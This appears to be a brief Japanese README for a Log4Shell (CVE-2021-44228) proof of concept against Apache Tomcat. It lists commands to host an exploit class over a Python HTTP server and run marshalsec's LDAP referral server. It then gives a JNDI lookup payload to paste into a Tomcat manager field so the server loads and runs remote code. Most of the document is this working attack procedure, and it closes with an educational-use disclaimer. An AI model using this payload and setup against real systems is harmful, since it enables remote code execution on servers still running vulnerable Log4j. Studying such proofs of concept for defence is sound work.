
Apache Tomcat における Log4j2 CVE-2021-44228 脆弱性の POC

git clone
cd apache-tomcat-10.0.14/bin
startup.bat
cd exploit
py -m http.server 8888
cd exploit
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
http://localhost:8080/manager/html のマネージャーアプリ内の「XML Configuration file path」フィールドに ${jndi:ldap://127.0.0.1:1389/Exploit} を入力します。
エクスプロイトクラスが読み込まれ、RCE が実行されます(電卓アプリが開きます)。
このリポジトリは教育目的で作成された POC にすぎません。リポジトリの所有者は、いかなる損害に対しても責任を負いません。道徳的な注意として、悪を行わないでください。
LDAP エクスプロイト https://github.com/mbechler/marshalsec